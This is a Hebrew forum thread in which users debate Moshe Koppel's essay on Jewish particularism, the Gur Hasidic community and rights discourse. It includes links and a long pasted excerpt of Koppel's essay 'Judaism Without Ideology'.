בית פורומים עצור כאן חושבים

ייחודה של הדת היהודית לפי משה קופל

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-22/2/2018 01:31 לינק ישיר 
ייחודה של הדת היהודית לפי משה קופל

לקוראי עברית ו"השילוח" ניתנה הזדמנות לקרוא את החלק הראשון בספרו הבא של פרופסור משה קופל. המאמר נמצא להורדה בלינק המובא כאן, ומי שגילה אותו הוא כמובן הספרן שלנו.

השם המוצלח והמסקרן הוא:

על שטריימל, שפת הזכויות ועתיד החברה

'על שטריימל, שפת הזכויות ועתיד החברה' / משה קופל

https://hashiloach.org.il/%D7%A2%D7%9C-%D7%A9%D7%98%D7%A8%D7%99%D7%99%D7%9E%D7%9C-%D7%A9%D7%A4%D7%AA-%D7%94%D7%96%D7%9B%D7%95%D7%99%D7%95%D7%AA-%D7%95%D7%A2%D7%AA%D7%99%D7%93-%D7%94%D7%97%D7%91%D7%A8%D7%94/

למה לקרוא את הדברים הבאים במקום את המאמר המקורי? ובכן, קודם כל – כדאי לקרוא אותו, כלומר את המאמר המקורי. משה קופל כותב חכם וגם יפה. האזהרה בראש המאמר כי הקריאה תיקח 37 דקות אינה צריכה להפחיד אף אחד. זה לוקח פחות, ואפשר גם לקרוא ברפרוף חלק מן הקטעים.

מה שאני מתכונן לעשות כאן הוא להציג בקצרה כמה תזות שמעלה קופל במאמרו. וגם להעיר עליהן. תיקון תוך כדי כתיבה: קצר? ובכן, אולי קצר יותר מקופל עצמו...(מאמר הביקורת הזה הוא רבע מגודלו של המאמר של קופל).

יודגש, שוב, כי התזות ראויות ללימוד ועיון. אני מסכם אותן בהתאם למאמרו. מה לעשות, בעידן האינטרנט הרבה מאד זמין, אבל זמן אינו זמין. אם איני מדייק, לא כלפי קופל ולא כלפי המקורות שלו, צר לי. קראו את דברי מתוך זהירות כפולה (השיטות בסוציולוגיה מסוכמות על ידי קופל ושוב על ידי. זה עלול להוביל לאי הבנות מצידי).

דווח על תוכן פוגעני

נשלח ב-28/2/2018 18:03 לינק ישיר 

פרט נמק הסבר ובעיקר הדגם מה זה פרטיקולרי בהקשר הנדון ומה זה הקצנה פרטיקולרית בהקשר הנדון

דדווח על תוכן פוגעני

נשלח ב-28/2/2018 17:16 לינק ישיר 

אפריםבן כתב:
ללא ספק הטקסט נכתב על ידי אדם משכיל שקנה את השכלתו לא בגור אלא בתרבות המערבית. 
הוא מהלל ומשבח את שימען מול היידי אבל כאשר קוראים את המסה שלו מבינים שהוא סותר את עצמו שהרי כל הגיגיו האינטלקטואליים המעניינים לא היו באים לעולם אלמלא התרחק מעולמו של שימען.
אילו כולם היו שימען העם היהודי כולו כבר היה נכחד בגלל האנטישמיות שעורר בכל מקום שבו חי.(פרט לתקופות זוהר קצרות)
שלא לדבר על חסידות גור היום שממחישה את הקיצון של החולי הכללי של החברה החרדית. 

הוא כותב בעצמו-שאלו שמקצינים לצד הפרטיקולרי-הם נושא למאמר נפרד...

דדווח על תוכן פוגעני

נשלח ב-22/2/2018 15:07 לינק ישיר 

ללא ספק הטקסט נכתב על ידי אדם משכיל שקנה את השכלתו לא בגור אלא בתרבות המערבית. 
הוא מהלל ומשבח את שימען מול היידי אבל כאשר קוראים את המסה שלו מבינים שהוא סותר את עצמו שהרי כל הגיגיו האינטלקטואליים המעניינים לא היו באים לעולם אלמלא התרחק מעולמו של שימען.
אילו כולם היו שימען העם היהודי כולו כבר היה נכחד בגלל האנטישמיות שעורר בכל מקום שבו חי.(פרט לתקופות זוהר קצרות)
שלא לדבר על חסידות גור היום שממחישה את הקיצון של החולי הכללי של החברה החרדית. 

דדווח על תוכן פוגעני

נשלח ב-22/2/2018 14:37 לינק ישיר 

אתקן את עצמי
הוא כתוב בצורה פה, שלא לדבר על התוכן שהוא מעניין מאוד אם כי ניתן לחלוק עליו.

אם ההנהלה יכולה למחוק את תגובתי הקודמת, אודה לה.

דדווח על תוכן פוגעני

נשלח ב-22/2/2018 13:10 לינק ישיר 

וכמה השגות שלי בקצרה מהפ"ב של צור ארליך שתרגם את המאמר:

א) נוח לתקוף אשת-קש כמו "היידי\אמבר", שמייצגות הלך-רוח ארה"בי-רדיקלי - השאלה מה תאמר לנוצרים האמריקאיים, שהם הרוב? כלומר - למה להיות חסיד גור ולא מורמוני, למשל? (אגב, מורמוניות היא הדת הצומחת ביותר בעולם).

ב) האם הכותב מבין את המשמעות של להיות חסיד גור? (שלא לדבר על חסידה?...) מדובר על חיים תחת משטר כמעט-רודני, הכולל ויתור על מחשבה חופשית, כדורי דיכוי חשק, מעקב 'רוחני' צמוד, ויתור מוחלט על חיי רוח (ולא, לימוד תורה בסגנון הגוראי הוא לא חיי רוח!) ועוד.

ג) ועיקר, מגזרים חריגים כמו המגזר החרדי מתפקדים רק בסביבה חיצונית שדואגת ל'זוטות' כמו החיים עצמם. זה נכן בארץ, וגם בחו"ל. האם "המודל הגוראי" יכול להוות מודל חיים לחברה עצמאית ומתפקדת? או שצריך איזה 'פריץ' (או לחלופין, 'ציוייני') שיעשה את העבודה השחורה? כן, אני יודע שבחו"ל הם נוהגים לעבוד (בשחור\אפור ואפילו בלבן...) - אבל עדיין יש תלות בלתי נתפסת ב'נגידים' ואכמ"ל.

דדווח על תוכן פוגעני

נשלח ב-22/2/2018 13:07 לינק ישיר 

ספרן

איקון ירוק

מעתה יש לשאול אם לדון במאמר החדש כאן או שם, בלינק שגילה חברנו אברם העברי. אם יש משותף לשני המאמרים, אזי נעשה זאת כאן.

אברם העברי

תודה על הלינק! ועל המקור העתיק יותר בפורום.

שלחתי לך שאלה באישי.

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-22/2/2018 13:04 לינק ישיר 

בעל

איקון ירוק

על המשפט המופלא

קראתי את המאמר, הוא כתוב בצורה יפה מאוד פרט לתוכן.

אני משער שיש לך השגות על חלקו או שמא הכל לקוי שם?

אני מחכה בקוצר רוח לראות את השגותיך המנומקות. בבקשה, חרוג נא ממנהגך והסבר באופן שיהיה לי ברור בלי שאצטרך לנחש את כוונותיך.

עוד כתבת:

שמישהו יסביר לי מה רע מצאה אמבר בירקות ממשפחת הסולניים.

לא מוכרת לי המשפחה הזו. אני משער שזו דוגמא לגישה שטחית שאופיינית לקבוצה שקופל יוצא נגדה. יתכן כמובן שבירקות אלו אכן יש בעיות מסויימות, אך יש בהם גם יתרונות, ולכן צריך להשתמש בהם במתינות. ואילו הגישה של אמבר היא הקצנה במקום שימוש זהיר והתעסקות בטפל במקום בדברים חשובים באמת.

דדווח על תוכן פוגעני

נשלח ב-22/2/2018 13:04 לינק ישיר 

כלינקזעצער ועוד לקרא:

* המאמר באקדמות: http://www.bmj.org.il/assets/files/1521292508897.pdf

* אשכול קודם (קצרצר): http://www.bhol.co.il/forums/topic.asp?cat_id=24&topic_id=1776937&whichpage=1&forum_id=1364#R_8

דדווח על תוכן פוגעני

נשלח ב-22/2/2018 13:01 לינק ישיר 

שלישישי

אנסה לפרש לעצמי את שאלתך. האם כוונתך היא שהישרדות של עם ואורח חיים והלכה הם אינם בעלי ערך באופן הכרחי?

אם זו כוונתך, אזי אתה צודק. יש כאן הנחת יסוד סמויה של המחבר, קופל, שההישרדות של העם היהודי, המוסברת באמצעות כלים מתורת המשחקים, היא דבר בעל ערך. דבר שראוי לשאוף אליו. דבר שקוראיו מן הסתם שמחים עליו.

אם תקרא את המאמר (אני מנחש שלא קראת?) תמצא בו צירוף משפטים מוצלח לטעמי:

ביחס לביקורת ולאיבה כלפי מדינת ישראל, קופל כותב (ותיכף אסביר איך אני מיישם זאת בשמו לגבי הביקורת שלך):

אם התשובה שעלתה בדעתכם היא שישראל היא, איכשהו, מדינה מרושעת יותר מכל האחרות על פי אמת המידה שמדינות נשפטות על פיה, לכו נא מכאן ואל תשובו. אינכם אנשים רציניים ואין לי מה להתווכח אתכם

יתכן שקופל היה עונה לביקורת שלך, מדוע שרידות חשובה, באופן הבא:

אם אתה סבור ששרידות של העם היהודי ושל ההלכה היהודית הן אינן חשובות, או שההלכה היא מרושעת או לא רלוונטית, אז אינך אדם רציני, אין לי מה להתווכח עמך, לך מכאן ואל תשוב.

זה מה שאולי קופל היה עונה.

אבל אני סבור שקופל אינו מתכוון לכך ברצינות, ואני בוודאי שלא. אני מאמין מאד בשיח, כלומר בדיאלוג, בהשוואה של נקודות מוצא והנחות יסוד.

לכן אני סבור שכנראה שאלת מדוע הישרדות של ההלכה היא טובה וחשובה. וזו שאלה מצויינת.

שוב ארשה לעצמי לדבר לרגע בשם קופל, כולל להוסיף דברים שלא אמר:

המאמר שלו בעצם נועד להראות כיצד ההלכה משרתת יעדים אנושיים כמו לתפקד בריא וטוב יותר בחברה (רעיון שמצוי למשל אצל הרמב"ם), שהיא, התורה וההלכה, מגלמת את חוקי המוסר, התועלת הקהילתית והפרטית וגם מערכת של התקרבות לאלוקים (כמובן צריך להאשים שיש כזה דבר, או לדעת).

אני משער שאולי הכוונה שלך היא לא לצאת נגד הרעיון שזה חשוב שיהיה "פולחן יהודי" אלא נגד פולחנים מסויימים שהתפתחו בתוך היהדות. אם זו הכוונה שלך אז אני מסכים. יש מקום לבחינה של מה הטכסים והאמונות שאנו כוללים היום ביהדות, לבדוק אם הם באמת נכונים, אם הם חלק מהיהדות המקורית.

כמובן, אם אתה סבור שכל דת היא רעה, וכל הלכה היא בלתי רצויה, אזי איני מבין את התזה הזו (אולי תרצה לבאר אותה).

דדווח על תוכן פוגעני

נשלח ב-22/2/2018 11:01 לינק ישיר 

יהדותללא
אידאולוגיה 

ישנו מנהג קדום שאבות כותבים לילדיהם צוואות המסכמות את הלקחים המוסרייםשצברו במהלך חייהם. בימים טרופים אלה ייתכן שמוטב לעשות זאת במוקדם ולאבמאוחר. הדרך הפשוטה ביותר תהיה שאומר לך בפשטות לדבוק באורח החייםשמכתיבה התורה: חיה בצדקות ובצניעות, אהוב את משפחתך, היה ידיד מסור וטובלב, עסוק בתורה, דקדק בקיום מצוות וכן הלאה. אך לו היה זה כל שחשתי שעלי לומר,
הייתי מפנה אותך לאיגרת הרמב"ן הנמצאת בסידורך. דבריו הם בני למעלה משבע
מאות שנה, ועדיין קשה מאוד לנסח אותם טוב יותר.
אולם מסר זה לבדו, אף–על–פי שהוא עדיין לגמרי במקומו, אינו מספיק לאתגריםשכבר ניצבים בפניך. המסורת היא, בסופו של דבר, מטרה נעה. ייתכן שמה שיהודיםנוהגים כיום איננו בדיוק מה שהספרים מאתמול מביאים כנורמות. למעשה, ייתכןשמה שהיהודים נוהגים בפועל כיום אינו עולה בקנה אחד עם הערכים המהווים נרלרגלם. אפילו המחויבים ביותר לתורה ולמצוות נאלצים להתמודד עם שאלות קשות.
באיגרת קצרה זו ברצוני להציע לך כמה קווים מנחים שיסייעו בידך לגבש גישה כלפי
בנושאים אלה.
* מאמר זה הִנו גרסה מתוקנת של המאמר שהופיע באנגלית ב– ( .Tradition, 36, 2 (Summer 2002
פרופ' משה קופל
מרצה במחלקהלמדעי המחשבבאוניברסיטת
בר–אילן
איגרת לבני הצעיר
משה קופל
52
אקדמות ט״ו • מרחשוון תשס״ה
כדי להבהיר את הבעיה, הרשה לי לספר לך משהו מקורות חיי כדי שתוכל לעמודעל ההקשר שבו הופיעו בעיות אלה לראשונה בעבורי (בעבורך ההקשר שונה מעטאך ההקבלות יהיו ברורות למדי). כילד בניו–יורק בשנות ה– 60 למדתי בבית–ספרשבימינו היה מוגדר חרדי. מה שייחד את בית–הספר הזה לעומת בתי–ספר אחרים,
לא–חרדיים, לא היה דווקא הרמה ההלכתית המחמירה יותר שאליה היינו מחויבים,
כמו התחושה השלטת של ניכור אל כל מה שמחוץ לעולמנו המצומצם. היינו ציניים
כלפי חוק וסדר, כלפי אידאות יומרניות, כלפי גויים, כלפי יהודים, כלפי הכול.
ייתכן שאפשר לפטור גישה כזאת בביטול ולראותה כתוצאה בלתי נמנעת של היותנוילדיהם של ניצולי שואה. אולם למעשה היתה זו רק גִרסה מעט מופרזת של חתרנותחשדנית המהווה רקע לכל דבר יהודי. "עבדיי הם" — יהודים הם עבדי ה', אך, מהשיותר חשוב לענייננו, לא עבדים לעבדים. על כל פנים, כל היהודים האמיתיים שאניהכרתי היו כאלה; אם היו אחרים, תמימים וחסודים יותר, הם היו במקום אחר. עדהיום אני חושב על ניכור ועל בת–דמותו, החתרנות, כבלתי נפרדים מיהדות. גישהזו, שהיא אולי מעט גלותית, טבועה עמוק בעצמותיי (וגם אליה, כמובן, אני מתייחס
בחשדנות).
לא תופתע לשמוע שחבריי ואני מיהרנו ליישם גישה ביקורתית זו גם כלפי כל דברשלימדו אותנו. גישה זו נתמכה בעובדה שלמרות שתחושת זהותם של הורינו כיהודיםהיתה מעל לכל ספק ואף מעבר לכל הרהור, הם עצמם היו ציניים למדי כלפי סוגהאידאולוגיה שרבותינו חשו צורך לקדם. גדולים אינם טועים? צדיקים מוצאיםמרגליות בדגים? אולי כך היה פעם. בשלב כלשהו נאלצנו בעצמנו להודות שהיו הרבהדברים שהגויים עשו טוב מאתנו. למעשה, ככל שהתבגרנו התחלנו לחשוד שייתכןשחלק מהדמויות ששימשו לנו מופת ניחנו יותר בחריפות מבתבונה ושבמקריםמסוימים ציניות כלפי כללים ותקנות הובילה לנוכלות ולנלוזות. לא שחשבתי אז, אושאני חושב היום, ששאר העולם טוב יותר, אולם אסתפק באמירה שדילמות מוסריותלא נעימות שעימתו בין נאמנות ליושר צצו יותר משהיו צריכות לצוץ. מעבר לכל זה,
לנער מתבגר שמנסה למצוא את עצמו ולפתח את תחומי התעניינותו ואת כישוריו,
האווירה היתה מחניקה מעט. בסופו של דבר נאלצנו להחליט אם לקבל את כל
המערכת על פגמיה או לעזוב. אני עזבתי.
לא הרחקתי. במוסד האורתודוקסי–מודרני (משהו דומה למה שנקרא בארץ דתי–לאומי)
שאליו נדדתי לבסוף, עקרון היסוד היה פתיחות. פתיחות לאמנות ולמוזיקה, למדעולספרות. שלא לדבר על ספורט, סרטים וטלוויזיה. חבריי החדשים ידעו להתבטא טוביותר, היו בעלי ידע נרחב יותר ברוב התחומים ולרוב ניחנו ביותר מוסריות טבעיתמרבים מחבריי בעולם הישיבות. כמובן, נאלצתי להתרגל לרעיון של חבר'ה עם שמותכמו ג'רי וסטואי שלבשו מכנסי ג'ינס ויצאו עם בנות. מתברר שהייתי מרובע חסרתקנה אך לפחות גיליתי — כך חשבתי — רוח מרדנית בריאה שטמנה בחובה בשורה
של יהדות חושבת יותר והזדהיתי עמה.
יהדות ללא אידאולוגיה
53
אבל היו כמה בעיות. גרסת היהדות שעודדו באותו מוסד אורתודוקסי–מודרני נבדלהבכמה היבטים חשובים מזו שהורגלתי אליה. המקום סבל מקרירות ליטאית שהותאמהבהצלחה להלך הרוח הטכנוקרטי האמריקאי ויצר גרסה פורמליסטית למדי של יהדות–
על–פי–מרשם. שאלת מישהו אם מותר להתפלל לבוש בגאטקעס, והוא התחיל לשלוףספרים מהמדף. כנטולי תחושת "היימישקייט" ומתוך השתוקקות למעטה של מהוגנותאמריקאית ממעמד–הביניים, הם נטו להמעיט בערכם של המחוות והמנהגים הקטנים
והקשים להגדרה שיוצקים תוכן בייחודיות היהודית.
יתרה מזאת, בעולם האורתודוקסי–המודרני התהפך הכלל הישיבתי ש"אם זה לאיהודי, אנחנו לא אוהבים את זה", לניסוח של "אם אנחנו אוהבים את זה, זה יהודי".
שני ניסוחים אלה אמנם שווים בספרי הלוגיקה אך לא במציאות. התברר שחברייהחדשים בעלי סגנון הלבוש המודרני לא היו, בסופו של דבר, בעלי הלך רוח מרדני;
הם פשוט דבקו בדרך היהדות — לעתים בתמימות משובבת למדי — שעל ברכיהנתחנכו. למעשה, דווקא ה'חניוקים' בעולם הישיבות, שהצליחו לשמור על ריחוק רגשיכלשהו מתסמיני המהוגנות של מעמד–הביניים, הם שהיו החתרניים. עדיין לא הגעתי
ממש לחוף מבטחים.
חוויותיי לא היו ייחודיות. הבעיה לא החלה במוסדות שבהם למדתי, אלא ביהדותהממסדית באופן כללי. כדי לראות מדוע הן מוסדות היהדות החרדית והן מוסדותהיהדות המודרנית סובלים מליקויים חמורים, עלינו להבין בראש ובראשונה מדועההגדרה המילונית המקובלת ל"יהדות" אינה מספיקה. אין ספק שבבסיסה היהדות היאהיא ההלכה כפי שנתפרשה ונערכה ברצף הדורות על–ידי תנאים ואמוראים, ראשוניםואחרונים — עליך רק לפתוח את הספרים והרי היא לפניך. אלא שהגדרה זו אינה
לוקחת בחשבון שני עקרונות בסיסיים.
ראשית כל, היהדות איננה רק מערכת של חוקים, יש בה עולם שלם של דעות והשקפותבנושאים עקרוניים. דעות והשקפות אלה באות לידי ביטוי בשלל גישות המתייחסותבין השאר לאופן שבו אמורות להיראות משפחות וקהילות, ולמערך שלם של תכונותאופי רצויות. גישות ותכונות אלה הוטבעו בתורה שניתנה לנו בסיני והן זכו להדגשיםולדפוסים מסוימים בעקבות ניסיוננו הקולקטיבי במרוצת הדורות. אלה כולליםנדיבות, ענווה, אמפתיה, התנכרות, הומור עצמי, נימוס, אי–תפישת הנאות כמובנותמאליהן, וכחנות, ספקנות, מודעות לסבל, וכו'. אין מה להתווכח על הרכב הרשימה— מה שאציין כאן כמעט אינו משנה. גישות ותכונות אלה מונחלות מהורה לילד,
ומרב לתלמיד, ומופצות בקרב הקהילות השונות בשלל נימות זניחות כשלעצמן. רקמעטות מהן נאמרות במפורש. חוקים ניתנים לשימור בספרים ולתיוק בידי פקידים,
גישות הן טבועות, עמוקות ומאפיינות יותר. אך שלא כחוקים, גישות יכולות להיעלםבמחי יד באווירה תרבותית משתנה, בעיקר אם אינן באות לידי ביטוי מעשי. יסוד–
היסודות של היהדות הוא אם כן שימור גישות אלה והעברתן הלאה.
54
עיקרון שני הוא שלכל אדם צרכים משלו, מוקדי עניין, כישרונות, תכונות אופי ונטיותחברתיות. לעתים הם חיוביים ולעתים שליליים, אך בדרך כלל הם נתפשים כתשתיתלחיי תורה. אנשים צריכים לאכול ולהתחתן, לעבוד ולהרוויח את לחמם, ליהנותמאמנות וממוזיקה, להתרועע עם אחרים ולהבינם, להגן על חייהם ועל רכושם, לעמודעל סודות הטבע ולנצלם לצורכיהם. יכולתי לנסות להוכיח לך שהתנ"ך והגמראמלאים סיפורים שבהם הנחת היסוד היא שצרכים אלו קיימים ומובנים מאליהם.
אך מיותר לעשות זאת: בתוך תוכך אתה כבר יודע שסיפוקם של צרכים אלו חיוני
להתפתחות הרגשית והשכלית, האנושית והטבעית.
ואולם, לעתים הדברים מסתבכים כאשר השקפות שאתה תופש כחלק בלתי נפרדמזהותך אמנם עולות בקנה אחד עם כתבה ולשונה של ההלכה, אך איכשהו אינןמשתלבות בגישות שמשפחתך וקהילתך מתאמצות להנחיל לך. לדוגמה, תחושותיךהלאומניות יכולות להתנגש עם מסורת של איפוק ומתינות שנתפשת בעיניךכתבוסתנות; או אולי תרגיש תסכול כשנטיותיך השוויוניות יתנגשו עם מבנה חברתיהיררכי–מסורתי; ייתכן שהתעניינותך במדע תוגבל מפאת חשיבות ההתמקדותבלימוד תורה; אולי יתייחסו בביטול לכישרונך האמנותי הנדיר; התמקדותך בהיבטיםהטקסטואליים וההיסטוריים של הגמרא עלולה להוציא אותך אל מחוץ לשיח הישיבתיהמקובל; קרוב לוודאי שסגנונך הרוחני החופשי והאינדיבידואליסטי ידוכא על–ידימסורת של משמעת ואחידות; תאוותך לנדודים תסוכל בדרישה להתיישב ולקבל על
עצמך עול של מחויבויות מסורתיות.
אומר באופן המוחלט ביותר: כאשר תביעותיה של ההלכה אינן משתמעות לשני פנים,
עליך לציית להן. אך כיצד יש לנווט בין גישות מסורתיות שאינן מוגדרות באופן ברורלבין נטיות אישיות מובהקות? כשהייתי בגילך לא היתה לי תשובה (ואני מודה שעדהיום אין לי), אולם באותה תקופה ההנחה שעקביות היא חיונית היתה מובנת מאליהבעבורי. במילים אחרות, חשתי שכך או אחרת אני חייב לוודא שהגדרת היהדות שלי
והגדרת המחויבויות שלי בהתחשב בנטיותיי, יתיישרו זו עם זו.
היום אני משוכנע שאין מקום למחויבות לעקביות. להפך! במחויבות לעקביות אנימוצא את שורש כל הרעות הקיימות ביהדות הממסדית. לעניות דעתי, אין כאן מקוםלא להגדרת היהדות ולא להגדרת נטיותיי. הגדרות אלו מצמצמות את היהדות לכלל
אידאולוגיה וזה בדיוק מה שהיהדות היא לא.
ואסביר את דבריי: מכיוון שמוסדות חינוך בנויים להקניית ידע מתוך ספרים וניסוחיםשבלוניים יותר משהם בנויים להקניית גישות בלתי–מוגדרות, הם לעולם יינטו לכיווןהאידאולוגיה, ובכך נעוץ כישלונם. לא המוסדות החרדיים ולא המוסדות של קהילתהאורתודוקסיה המודרנית (או הדתית–הלאומית) הצליחו אי–פעם להקנות, או אפילולהחזיק, יהדות "היימיש" נורמלית, מלאת הומור, יצירתיות ויראת שמים אותנטיתשהיתה טבעית ליהודים פשוטים בקהילות ברחבי העולם במשך אלפי שנים. במיליםאחרות, שפת היהדות היתה שגורה על לשונם של יהודים רגילים, נבונים ומחויביםכשפת אם — בשטף ובטבעיות. במוסדות החינוך מלמדים את התלמידים לדבר את
יהדות ללא אידאולוגיה
55
לשון היהדות כשפה שנייה, כשהם כפויים להתמודד עם כללי דקדוק שלא הופנמו
היטב.
האידאולוגים שניהלו את המוסדות הישיבתיים שאני הכרתי ניסו להשריש מערכתמחויבויות אידאולוגיות כה מקיפה ועזה עד כדי החנקת האישיות. אחת התוצאותמכך היתה ציניות שהובילה לעתים לאובדן מוחלט של כל תודעה מוסרית ואסתטית.
החדשות הטובות הן שהדברים לרוב הועילו בקרב החלשים; חצֵי הציניות של האנשיםהנורמליים כוּונו גם לעבר חינוכם שלהם. לדוגמה, רובנו התמודדנו די בקלות עםהאמונה שבאופן עקרוני רבנים גדולים ניחנים ב'דעת תורה', תהיה משמעותה אשרתהיה, גם אם בפועל לגבי רוב הרבנים שאנחנו הכרנו היה אפשר לומר שיראתם קדמה
לחוכמתם.
לעומת זאת, בכמה ממוסדות האורתודוקסיה המודרנית שאני מכיר, רבים מדרכיההתייחסות העדינות המרכיבות את לִבה של היהדות הידלדלו עד כדי אובדן. מהשנותר הוא גרסה עקרה — גם אם דבקים בה בחומרה רבה — של הלכה, שמתפקדתכמעין מסלול מכשולים שיש להתמודד עמו בדרך להגשמה עצמית. אולם חמור מכךהוא שרדיפת ההגשמה העצמית הזו אינה נחלתם של יחידים הנוטים באופן טבעילכיוונים המתאימים לשורש נשמתם, אלא משותפת לכול ונעשית על–פי תבניותהמוגדרות על–ידי הרוח התרבותית השלטת — הומניזם, פמיניזם, לאומנות, מהשלא יהיה. וכך עלולה להיווצר תורה משוללת חיוניות שלעולם כפופה לאופנותאינטלקטואליות חולפות. למרבה המזל, בדרך כלל, אופנות אכן חולפות — או
שלמפרע מתברר שאינן אופנות.
באופן כללי, היהדות הממסדית היא שטחית ולא אותנטית. בממסד, אידאולוגיהאחידה תמיד גוברת על שכל ישר. בהיעדר בלמים היוצרים מתח בריא, נעלמותתחושות פרופורציה והגבלה והיהדות עצמה נדחקת ומסתלפת. מן הסתם עדיין אינךיורד לסוף דעתי בנקודה זו, מכיוון שאתה בשלב בחייך שבו הכול שחור או לבן ונדמהלך שחשוב להעמיד דברים על דיוקם המלא. מה שאני מכנה מתח, אתה מכנה צביעות.
הזמן, אין ספק, ירחיב את מבטך.
כדי להסביר היטב מהי לדעתי היהדות, אספר לך מעט על הורי–סבך. אלה מהם ששרדואת השואה היו אוּדים אחרונים שנותרו ממשפחתם ומקהילתם. לשונם היתה יידישוהם דנו את המציאות בקריטריונים חסידיים, אפילו אם באמריקה שלאחר המלחמההקלו בהם מעט. הם הודו על החירויות שאמריקה פרשה בפניהם, אך התייחסו לתרבותבאמריקה, על יהודיה האמריקאיים, כ'פרוסט', גסים, נבערים ומסורים לתאוותיהם.
הם היו בני אותה קבוצה הולכת ונעלמת של חסידים לא–מזוקנים, תלמידי חכמיםשמחויבים ליהדות הנושנה אך משוללי רגשנות–יתר כלפיה. דתיותם לא היתה כעסניתולא נאיבית, אלא אינסטינקטיבית. הם היו ישרים להפליא מחד גיסא ונאמנים מאודלחבריהם מאידך גיסא, שמקצתם היו ישרים קצת פחות. הם היו, בעולם החסידות,
56
אנשים מבפנים שבחרו לשמור על מרחק בטוח, כלומר לא לגמרי בפנים ולא לגמרי
בחוץ. הם ידעו בדיוק מה אורכן של שרשראות העיגון שלהם.
אגודה? מזרחי? אלה היו כר לוויכוחים סוערים, אך לא הרבה מעבר לכך (אחד מהםצחק שכל מה שנשאר מימיו באגודה היא סלידתו ממזרחי...) שאלת המדינה כ'ראשיתצמיחת גאולתנו' לא הטרידה אותם (למרות שכמובן התפללו שאכן תהיה כזו). הם לאתמכו במדינה ללא סייג כיוון שהיתה ראשית הגאולה אך גם לא דחו אותה כיוון שלא
היתה כזו. הם פשוט תמכו במדינה כיוון שחשו שזה טוב ליהודים.
נדמה לי לצערי שקשה לך להבין מורשת זו כדבעי, מכיוון שהיא לא שרדה באף לאאחת מן האידאולוגיות הסטריאוטיפיות השולטות כאן בישראל. האם אי–פעם עמדתבטקס יום הזיכרון ובכית על אלו שנפלו ועל אלו שלא זכו לחלוק עמנו את הפלאהאדיר של קיומה של המדינה, ועל סבלם של אבותינו במשך אלפי שנים... ויחד עםזאת לבך גם התכווץ מהריקנות והתִפלות המשוועת שבטקסים גנדרניים וחקייניים
אלו? אם עד עתה זה לא קרה אני מקווה שביום מן הימים כך יהיה.
הסבתות שלך ושלי האמינו שתפקידן העיקרי הוא לוודא שלילדיהם יהיה די–מחסורם,
ושיהיו בריאים, שומרי מצוות, ובעלי 'מנטשלעכקייט'. מסירות הנפש שלהן למימושיעדים אלה, בנסיבות שקשה לנו לדמיין, מרטיטה את הלב. אך אל תחשוב לרגע שהןעשו זאת מתוך נאיביות מוקסמת או צדקות קיצונית. רגליהן ניטעו בעיקשות בקרקעהמציאות, וכשנחה עליהן הרוח הן היו מסוגלות לשעשע בביקורות נוקבות על קהילתה'ליידיג–גייערים' ו'דרייקופים' שלהן שהיו גורמות לשלום עליכם להסמיק. האמןלי שהן לא היו נשות 'צאינה וראינה' והן היו צוחקות עד דמעות מהרעיון שנשים
תשתתפנה בסמינרים על הרעוֹת של המודרנה.
אין ספק שהמנהג המקובל היום של סריקת מקורות הלכתיים כדי למצוא בסיס ל"עניינינשים" למיניהם היה נתפש בעיניהן כעוד יותר משונה. מה זה משנה מה כתוב בספרזה או אחר, היו ודאי שואלות, אם כולם כבר יודעים מה היהודים עושים מאז ומעולם?
אין ספר שיכול לשנות את העובדות. וחוץ מזה אם אתה רוצה לחטוא, למה לטרוחולקרוא לזה מצווה? כפי שהיה די מקובל בקרב נשות חסידי פולין באותן שנים, אחתמסבתותיי נהגה לשחק בקלפים מדי פעם, האחרת קראה רומנים, שתיהן בירכו ברכתהמזון רק בשבת ובחגים והתפללו רק בימים נוראים וב'יזכור', ומעולם לא עלה בדעתןלנסות ולהצדיק דבר מן הדברים. דווקא מכיון שהן התייחסו ברצינות ליהדות הן לאניסו להגדיר אותה מחדש כדי שתתאים לצורכיהן (אמא ביקשה שאציין שהסבתותשלה התפללו כל יום — ואחד מהסבים שלה היה ליטאי מזוקן...). אם נדבר על דוגמהקיצונית יותר שמכה היום גלים, הן בוודאי היו נרתעות מהרעיון שנשים רווקות ייכנסולהיריון, אך גם היו חשות חמלה כלפיהן; הן היו נותרות בלי מילים מעצם הרעיוןשמאן–דהו יפרסם מאמר שמצדיק החלטה שכזאת. ככלל, הצגה ראוותנית של צדקות
נלהבת וחריגה נתפשה בעיניהן כאדיקות–יתר, במובן הנוצרי של המילה.
יהדות ללא אידאולוגיה
57
אני לא מספר לך את הדברים בכדי לומר שהורי זקניך היו יוצאי דופן. אדרבה, מהשאני מנסה להדגיש כאן הן בדיוק אותן הסגולות ביהדותם שהיו אופייניות לדורם:
יהדות מלומדת, מלאת דקויות, אנושית ואותנטית. זהו סוג היהדות שאני רוצה להנחיל
לך. לא תוכל לרכוש אותה בשום מוסד.
אתה יכול — ובהתחשב בתנאים של היום, אתה חייב — ללמוד ש"ס ופוסקיםבמוסד תורני. אולם קניית "יידישקייט" והפנמתו חייבת לנבוע מהתמסרות למשפחהאו לקהילה, ויש לחיות אותו באינסטינקטיביות. ערכים מופנמים שחיים אותםבאינסטינקטיביות לעולם לא יהיו 'דרך' מוגמרת. כלפי לייא, הם תמיד רוויים במתחשבין קטבים מנוגדים: בין נאמנות ליהודים לנאמנות לערכים שעליהם להגשים, ביןההלכה כלשונה לבין רוחה, בין אחידות לאינדיבידואליות, וכן הלאה. מתח זה הואנפלא ובריא — ממנו מקור החיוניות והיצירתיות של האדם. חיים של תורה פירושםחיים רוויי מתח: היהדות לא נועדה להיות אוסף פתרונות מיידיים לבעיות אישיות,
תאולוגיה רדודה מתוך אריזה, אסתטיקה נבובה או צרות אופקים פרובינציאלית.
היהדות נועדה לעודד את ההעמקה ואת המתח — ואני משוכנע שתבין למה אנימתכוון — שמבדילים בין קרליבך ובין 'אוף שימחעס', במחילה על הדוגמה המוזרה.
מתח יצירתי זה הוא בדיוק מה שמבדיל בין היהדות לבין תרבויות אחרות והוא שאִפשרליהדות לשרוד בתנאים בלתי נסבלים. מה שנדרש הוא מצד אחד, מסירות אדירהלמורשת עד לפרטים הקטנים והטריוויאליים ביותר, ועמידה כנועה אל מול משקלההמצטבר של מסורת זו. מצד אחר מתח יצירתי הקורא תיגר תמידי על כל שאננותרוחנית, בכך שהוא מעמת בין המסורת לבין הערכים שהיהדות מנחילה למסורים לה
